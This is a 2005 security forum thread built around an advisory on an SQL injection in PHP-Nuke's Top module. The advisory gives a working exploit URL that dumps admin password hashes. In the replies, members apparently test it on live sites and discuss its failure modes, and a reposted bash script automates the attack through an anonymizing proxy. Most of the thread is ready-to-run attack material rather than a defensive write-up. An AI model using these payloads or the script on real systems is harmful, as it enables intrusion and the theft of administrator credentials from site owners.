 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 591
 Members: 0
 Total: 591
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module |
|
 Posted: Wed Apr 06, 2005 6:43 pm |
 |
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
{================================================================================}
{ [waraxe-2005-SA#041] }
{================================================================================}
{ }
{ [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 06. April 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-41.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands websites, because it's
freeware, easy to install and manage and has broad set of features.
Homepage: http://phpnuke.org
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Like title says, this time the sql injection security hole have been found in
phpnuke "Top" module. Lets look @ source code of the phpnuke 7.6 top module
index file (/modules/Top/index.php) ~ line 186:
[original source code]
/* Top 10 Polls */
$result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang");
if ($db->sql_numrows($result8)>0) {
echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n"
."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n";
$lugar = 1;
$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
$querylang order by voters DESC limit 0,$top", $dbi);
$counter = 0;
[/original source code]
And what's the problem? It appears, that variable "$querylang" is uninitialized. So, if we
will "poison" php variable space through GET/POST/COOKIE, then sql query manipulation is
possible.
[real life exploit]
http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
[/real life exploit]
... and as result we can see md5 hashes of all the admin passwords in place, where normally
top 10 votes can be seen 
Of course, mysql version 4.x must be used with enabled union functionality. And if there are
Sentinel or similar protection systems installed, additional measures must be used to evade them.
Have a nice day!
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For help look @ http://www.waraxe.us/forums.html
Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/
SiteMapper - free php script for phpNuke powered websites -
newest version 0.4 can be downloaded @ http://sitemapper.waraxe.us/
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and
all other active members from my forum !
Special greets to Heintz - congrats about phpbb sploit finding !
Tervitused - Raido Kerna !
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------ |
|
Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Wed Apr 06, 2005 7:10 pm |
|
|
| murdock |
| Advanced user |
 |
| |
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Wooow Waraxe!!!!!! Nice one! 
I try it now immediatly!
Salut! |
|
|
|
|
| Posted: Wed Apr 06, 2005 9:57 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
By the way, i found this sql injection bug many time ago, somewhere november 2004, and had not published it yet. More than 3 month was passed but nobody has found that little security bug 
Even worst, this bug exists even in very old nuke versions, maybe 5.x too, have not tested...  |
|
|
|
|
| Posted: Wed Apr 06, 2005 10:12 pm |
|
|
| murdock |
| Advanced user |
|
| |
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Jejeje, as we say in spain: "Lo bueno se hace esperar"
(In english means: "Good things make you wait", or something like this  ) |
|
|
|
|
| Posted: Thu Apr 07, 2005 7:31 am |
|
|
| y3dips |
| Valuable expert |
 |
| |
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
there you go waraxe, step ahead to back on track
maybe u could input it on your SQLaxe library |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Thu Apr 07, 2005 10:22 pm |
|
|
| LINUX |
| Moderator |
 |
| |
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| good work waraxe |
|
|
|
|
| Posted: Thu Apr 07, 2005 10:33 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Thanks, mate
By the way - new advisory will come out somewhere next week and it will be not about phpnuke, but some other widely-used software
So, stay tuned and check bugtraq and my forum  |
|
|
|
|
| Posted: Fri Apr 08, 2005 9:43 am |
|
|
| SteX |
| Advanced user |
 |
| |
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Fri Apr 08, 2005 12:12 pm |
|
|
| shai-tan |
| Valuable expert |
|
| |
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.
Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol
Thanks for the name mention. That makes me proud.
BTW I just got all my hair shaved off. So I look like a skin head. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Fri Apr 08, 2005 12:28 pm |
|
|
| murdock |
| Advanced user |
|
| |
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Wow! My name is also mentioned! :_ )
Thanks waraxe! |
|
|
|
|
| Posted: Fri Apr 08, 2005 12:34 pm |
|
|
| shai-tan |
| Valuable expert |
|
| |
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Dam you
You got your name mention first |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 2:15 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| shai-tan wrote: | Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.
Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol
Thanks for the name mention. That makes me proud.
BTW I just got all my hair shaved off. So I look like a skin head. |
There are many restricting factors to be that exploit successful:
1. UNION functionality means that mysql engine must be > 4.x
2. there must be Top module activated
3. if there is not enough voted polls, sploit will not work
etc ...
But real-life tests will show, that there is a lots of phpnuke driven websites waiting for pach |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 2:46 pm |
|
|
| murdock |
| Advanced user |
|
| |
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Here are the typical erros I get using this exploit:
Sometimes returns:
| Code: | 10 primeras encuestas m?s votadas
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414
10 autores m?s activos |
Sometimes simply appears nothing:
| Code: | 10 primeras encuestas m?s votadas
10 autores m?s activos |
And sometimes simply...works! http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 2:51 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yes, that's it:
Case 1 - mysql 3.x without UNION functionality:
| Code: | 10 primeras encuestas m?s votadas
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414
10 autores m?s activos |
case 2 - not enough votes or votes disabled:
| Code: | 10 primeras encuestas m?s votadas
10 autores m?s activos |
And if you are lucky enough:
|
|
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 8:08 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Look here for sploit derivation:
http://www.milw0rm.com/id.php?id=921
| Code: |
#/bin/bash
# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke
#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!
#
URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";
echo -e "\n PHPNuke Top Module Remote SQL Injection"
echo -e " by Fabrizi Andrea 2005"
if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.site.net phpNuke\n"
exit
fi;
if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]
|
Nice one |
|
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2 Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
